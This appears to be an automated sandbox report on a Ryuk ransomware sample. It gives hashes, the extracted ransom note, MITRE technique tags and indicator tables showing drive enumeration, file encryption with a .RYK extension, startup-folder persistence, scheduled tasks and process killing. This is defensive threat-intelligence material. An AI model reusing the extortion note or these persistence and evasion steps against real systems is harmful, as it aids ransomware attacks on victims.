ryuk | 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

Analysis

max time kernel
137s
max time network
52s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
20-10-2022 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
Size

885KB
MD5

a650d5676dc2c91a3af2216044ddaf8c
SHA1

851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256

775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512

463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
SSDEEP

12288:q/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgooRn6X:qbC8tUlqgQKUKRjsKqgbN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1660	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\Z:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\F:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\M:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\R:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\O:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\U:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\I:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\K:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\A:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\J:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\N:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\B:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\P:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\S:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\E:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\G:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\H:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\W:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\X:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\Y:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\L:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\Q:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened (read-only)	\??\T:	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File created	C:\Program Files\7-Zip\hrmlog1	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACECORE.DLL.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EXPEDITN\EXPEDITN.INF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107182.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Google\RyukReadMe.html.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Amman.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File created	C:\Program Files\7-Zip\RyukReadMe.html	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Bahia_Banderas.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105530.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\PREVIEW.GIF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00526_.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\3RDPARTY.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Nipigon.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LAYERS\LAYERS.INF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Jamaica.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html.[[email protected]].RYK	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2044	schtasks.exe
588	schtasks.exe
1516	schtasks.exe
1732	schtasks.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1944	taskkill.exe
1912	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 860 wrote to memory of 840	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	28
PID 860 wrote to memory of 840	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	28
PID 860 wrote to memory of 840	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	28
PID 840 wrote to memory of 2044	840	cmd.exe	29
PID 840 wrote to memory of 2044	840	cmd.exe	29
PID 840 wrote to memory of 2044	840	cmd.exe	29
PID 860 wrote to memory of 1736	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	30
PID 860 wrote to memory of 1736	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	30
PID 860 wrote to memory of 1736	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	30
PID 860 wrote to memory of 268	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	31
PID 860 wrote to memory of 268	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	31
PID 860 wrote to memory of 268	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	31
PID 860 wrote to memory of 1528	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	32
PID 860 wrote to memory of 1528	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	32
PID 860 wrote to memory of 1528	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	32
PID 1528 wrote to memory of 588	1528	cmd.exe	33
PID 1528 wrote to memory of 588	1528	cmd.exe	33
PID 1528 wrote to memory of 588	1528	cmd.exe	33
PID 860 wrote to memory of 332	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	34
PID 860 wrote to memory of 332	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	34
PID 860 wrote to memory of 332	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	34
PID 332 wrote to memory of 596	332	cmd.exe	35
PID 332 wrote to memory of 596	332	cmd.exe	35
PID 332 wrote to memory of 596	332	cmd.exe	35
PID 860 wrote to memory of 612	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	36
PID 860 wrote to memory of 612	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	36
PID 860 wrote to memory of 612	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	36
PID 612 wrote to memory of 1516	612	cmd.exe	37
PID 612 wrote to memory of 1516	612	cmd.exe	37
PID 612 wrote to memory of 1516	612	cmd.exe	37
PID 860 wrote to memory of 528	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	38
PID 860 wrote to memory of 528	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	38
PID 860 wrote to memory of 528	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	38
PID 528 wrote to memory of 1732	528	cmd.exe	39
PID 528 wrote to memory of 1732	528	cmd.exe	39
PID 528 wrote to memory of 1732	528	cmd.exe	39
PID 860 wrote to memory of 700	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	40
